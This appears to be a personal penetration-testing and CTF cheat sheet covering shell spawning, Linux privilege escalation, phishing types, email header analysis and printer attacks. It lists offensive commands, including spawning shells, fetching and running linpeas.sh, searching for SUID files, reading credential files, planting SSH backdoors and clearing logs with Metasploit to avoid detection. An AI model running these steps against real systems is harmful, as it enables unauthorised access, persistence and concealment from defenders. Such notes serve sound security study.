python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB
exec "/bin/sh"
From within vi
:!bash
From within vi
:set shell=/bin/bash:shell
From within nmap
!sh
Many of these will also allow you to escape jail shells. The top 3 would be my most successful in general for spawning from the command line.
Reverse shells are used to connect back to a listening machine. This is useful when you have a shell on a machine, but you want to connect back to your own machine.
A useful website to generate a reverse shell is RevShells.
Other useful reverse shells can be found in this repo: PayloadAllTheThings.
For PHP, you can take a look at this RS from PentestMonkey: PHP Reverse Shell
TO BE ADDED
Check for root password
- Run:
id
- Run:
sudo -l
to list commands that can be run as root - Check
cat /etc/*release
for OS version - Locate password folder and crack it using johntheripper
- Remember to look for cron jobs or other running tasks. If they require root, use pspy.
- Or use GTFOBins
You can also run:
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
To download and then execute the script on a target machine to see the files that stand out.
Another option would be to run the following command to find all files with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
fine
find / -user root -perm 4000 -print 2>/dev/null
good
find / -user root -perm 4000 -exec ls -ldb {} \; 2>/dev/null
better
find / -user root -perm 4000 -exec ls -ldb {} \; 2>/dev/null | grep 'bin'
best
2>/dev/null
will filter out the errors so that they will not be output to your console
Find users on a system
cat /etc/passwd | grep “/bin/bash”
Find passwords
cat /etc/passwd
If you don't have privilege, try this
find / -name shadow* 2>/dev/null | head
I've explained the /etc/passwd format here, in case you want to know more.
-rwsr-xr-x
“s” = SUID. This means that any user can execute these commands and they will be ran as the original owner.
Example
Lets say the cat
command had the 's' in its SUID. Then you would be able to use something like the following command to read a flag:
find /home/berkan/flag1.txt -exec cat {} \;
Create a .ssh
folder in the home directory of the user you want to keep a backdoor. Keep in mind that the permissions of the .ssh
folder should be 700
and the files withing should be 600
.
MetaSploit has a tool called suggester
that can be used to find exploits for a specific system.
msf6 > use post/multi/recon/local_exploit_suggester
After you have escalated your privileges, you should clean up the logs to avoid detection. One tool for this is the clearev
command for metasploit.
msf6 > clearev
A vulnerability in cybersecurity is defined as a weakness or flaw in the design, implementation or behaviours of a system or application. An attacker can exploit these weaknesses to gain access to unauthorised information or perform unauthorised actions
There are arguably five main categories of vulnerabilities:
Vulnerability | Description |
---|---|
Operating System | These types of vulnerabilities are found within Operating Systems (OSs) and often result in privilege escalation. |
(Mis)Configuration-based | These types of vulnerability stem from an incorrectly configured application or service. For example, a website exposing customer details. |
Weak or Default Credentials | Applications and services that have an element of authentication will come with default credentials when installed. For example, an administrator dashboard may have the username and password of "admin". These are easy to guess by an attacker. |
Application Logic | These vulnerabilities are a result of poorly designed applications. For example, poorly implemented authentication mechanisms that may result in an attacker being able to impersonate a user. |
Human-Factor | Human-Factor vulnerabilities are vulnerabilities that leverage human behaviour. For example, phishing emails are designed to trick humans into believing they are legitimate. |
A BEC (Business Email Compromise) is when an adversary gains control of an internal employee's account and then uses the compromised email account to convince other internal employees to perform unauthorized or fraudulent actions.
A typosquatting attack, also known as a URL hijacking, a sting site, or a fake URL, is a type of social engineering where threat actors impersonate legitimate domains for malicious purposes such as fraud or malware spreading.
Spam
Unsolicited junk emails sent out in bulk to a large number of recipients. The more malicious variant of Spam is known as MalSpam.
Phishing
Emails sent to a target(s) purporting to be from a trusted entity to lure individuals into providing sensitive information.
Spear phishing
Takes phishing a step further by targeting a specific individual(s) or organization seeking sensitive information.
Whaling
Is similar to spear phishing, but it's targeted specifically to C-Level high-position individuals (CEO, CFO, etc.), and the objective is the same.
Smishing
Takes phishing to mobile devices by targeting mobile users with specially crafted text messages.
Vishing
Is similar to smishing, but instead of using text messages for the social engineering attack, the attacks are based on voice calls.
- Open Email
- See its raw format
- Analyze the results:
- X-Originating-IP - The IP address of the email was sent from (this is known as an X-header)
- Smtp.mailfrom/header.from - The domain the email was sent from (these headers are within Authentication-Results)
- Reply-To - This is the email address a reply email will be sent to instead of the From email address
In case the mail is encoded using base64, the following command can be used to decrypt the message:
base64 -d <filename> > decrypted.<filetype>
Hyperlinks and IP addresses should be defanged.
Expand shortened links with this tool.
to be added
Enumeration and exploitation tools can be found here.
Printer security cheat sheet can be found here.
It allows clients to submit one or more print jobs to the printer or print server, and perform tasks such as querying the status of a printer, obtaining the status of print jobs, or canceling individual print jobs."
Most of them appear to run the CUPS server (which is a simple UNIX printing system).
Running python pret.py
will start an automatic printer discovery in your local network.
If you think others could benefit, please consider sharing it with your network or giving it a star ⭐ on GitHub - every bit of support helps this project grow and reach more people. And if you’re enjoying the content as much as I am, a little ☕ goes a long way in keeping it fueled!
Thank you for being part of this journey, and happy hacking!